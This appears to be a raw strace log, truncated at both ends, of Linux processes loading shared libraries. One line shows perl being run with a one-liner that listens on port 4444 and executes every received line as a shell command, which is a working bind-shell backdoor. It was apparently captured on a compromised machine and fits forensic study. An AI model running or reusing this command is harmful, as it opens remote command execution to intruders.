\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

7948  07:21:09.317327 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

7948  07:21:09.317344 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d5b000

7948  07:21:09.317356 mmap2(0xb7d62000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d62000

7948  07:21:09.317372 close(1)          = 0

7948  07:21:09.317384 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.317397 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

7948  07:21:09.317411 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

7948  07:21:09.317496 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

7948  07:21:09.317513 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d43000

7948  07:21:09.317524 mmap2(0xb7d57000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d57000

7948  07:21:09.317539 mmap2(0xb7d59000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d59000

7948  07:21:09.317556 close(1)          = 0

7948  07:21:09.317610 munmap(0xb7ee9000, 29913) = 0

7948  07:21:09.317644 open("/etc/ld.so.cache", O_RDONLY) = 1

7948  07:21:09.317657 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7948  07:21:09.317673 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee9000

7948  07:21:09.317683 close(1)          = 0

7948  07:21:09.317694 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.317709 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

7948  07:21:09.317724 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7948  07:21:09.317824 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

7948  07:21:09.317841 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d39000

7948  07:21:09.317852 mmap2(0xb7d41000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d41000

7948  07:21:09.317869 close(1)          = 0

7948  07:21:09.317882 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7948  07:21:09.317894 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7948  07:21:09.317909 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7948  07:21:09.317995 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7948  07:21:09.318012 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d2e000

7948  07:21:09.318023 mmap2(0xb7d37000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d37000

7948  07:21:09.318039 close(1)          = 0

7948  07:21:09.318059 munmap(0xb7ee9000, 29913) = 0

7948  07:21:09.318100 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7948  07:21:09.318152 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7948  07:21:09.318178 _llseek(1, 0, [0], SEEK_CUR) = 0

7948  07:21:09.318190 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7948  07:21:09.318211 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7ef0000

7948  07:21:09.318222 _llseek(1, 1624, [1624], SEEK_SET) = 0

7948  07:21:09.318250 munmap(0xb7ef0000, 1624) = 0

7948  07:21:09.318260 close(1)          = 0

7948  07:21:09.318288 getpgrp()         = 3831

7948  07:21:09.318298 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7948  07:21:09.318313 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7948  07:21:09.318329 brk(0x8101000)    = 0x8101000

7948  07:21:09.318360 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7948  07:21:09.318375 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7948  07:21:09.318389 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7948  07:21:09.318425 brk(0x8102000)    = 0x8102000

7948  07:21:09.318453 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7948  07:21:09.318471 stat64("/sbin/AB", 0xbfb09158) = -1 ENOENT (No such file or directory)

7948  07:21:09.318483 stat64("/bin/AB", 0xbfb09158) = -1 ENOENT (No such file or directory)

7948  07:21:09.318494 stat64("/usr/sbin/AB", 0xbfb09158) = -1 ENOENT (No such file or directory)

7948  07:21:09.318506 stat64("/usr/bin/AB", 0xbfb09158) = -1 ENOENT (No such file or directory)

7948  07:21:09.318519 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7948  07:21:09.318533 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d646f8) = 7949

7949  07:21:09.318606 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7949  07:21:09.318625 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7949  07:21:09.318652 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7949  07:21:09.318663 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7949  07:21:09.318678 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7949  07:21:09.318694 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7949  07:21:09.318706 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7949  07:21:09.318760 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7949  07:21:09.318774 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7949  07:21:09.318841 exit_group(127)   = ?

7948  07:21:09.333597 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:21:09.333614 waitpid(7948,  <unfinished ...>

7948  07:21:09.333647 <... rt_sigprocmask resumed> NULL, 8) = 0

7948  07:21:09.333655 --- SIGCHLD (Child exited) @ 0 (0) ---

7948  07:21:09.333668 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7949

7948  07:21:09.333683 waitpid(-1, 0xbfb08dd8, WNOHANG) = -1 ECHILD (No child processes)

7948  07:21:09.333694 sigreturn()       = ? (mask now [])

7948  07:21:09.333715 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7948  07:21:09.333730 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7948  07:21:09.333741 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7948  07:21:09.333753 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7948  07:21:09.333770 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7948  07:21:09.333781 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7948  07:21:09.333814 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7948  07:21:09.333834 stat64("/sbin/perl", 0xbfb09188) = -1 ENOENT (No such file or directory)

7948  07:21:09.333846 stat64("/bin/perl", 0xbfb09188) = -1 ENOENT (No such file or directory)

7948  07:21:09.333857 stat64("/usr/sbin/perl", 0xbfb09188) = -1 ENOENT (No such file or directory)

7948  07:21:09.333868 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7948  07:21:09.333885 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7948  07:21:09.333910 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7948  07:21:09.333924 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d646f8) = 7950

7950  07:21:09.333967 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7950  07:21:09.333984 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7950  07:21:09.333997 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7950  07:21:09.334008 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7950  07:21:09.334092 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7950  07:21:09.334108 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7950  07:21:09.334135 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7950  07:21:09.334167 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7950  07:21:09.334253 brk(0)            = 0x8153000

7950  07:21:09.334273 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7950  07:21:09.334287 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9b000

7950  07:21:09.334303 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7950  07:21:09.334319 open("/etc/ld.so.cache", O_RDONLY) = 1

7950  07:21:09.334331 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7950  07:21:09.334348 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f93000

7950  07:21:09.334358 close(1)          = 0

7950  07:21:09.334369 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7950  07:21:09.334383 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7950  07:21:09.334397 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7950  07:21:09.334487 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7950  07:21:09.334504 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f8f000

7950  07:21:09.334542 mmap2(0xb7f91000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f91000

7950  07:21:09.334580 close(1)          = 0

7950  07:21:09.334608 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7950  07:21:09.334636 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7950  07:21:09.334650 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7950  07:21:09.334739 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7950  07:21:09.334756 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f6a000

7950  07:21:09.334767 mmap2(0xb7f8d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f8d000

7950  07:21:09.334783 close(1)          = 0

7950  07:21:09.334795 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7950  07:21:09.334808 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7950  07:21:09.334822 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7950  07:21:09.334906 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7950  07:21:09.334922 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f69000

7950  07:21:09.334935 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f51000

7950  07:21:09.334946 mmap2(0xb7f65000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f65000

7950  07:21:09.334960 mmap2(0xb7f67000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f67000

7950  07:21:09.334973 close(1)          = 0

7950  07:21:09.334985 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7950  07:21:09.334998 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7950  07:21:09.335012 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7950  07:21:09.335172 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7950  07:21:09.335190 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e02000

7950  07:21:09.335201 mmap2(0xb7f4b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f4b000

7950  07:21:09.335216 mmap2(0xb7f4e000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f4e000

7950  07:21:09.335232 close(1)          = 0

7950  07:21:09.335244 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7950  07:21:09.335257 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7950  07:21:09.335271 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, 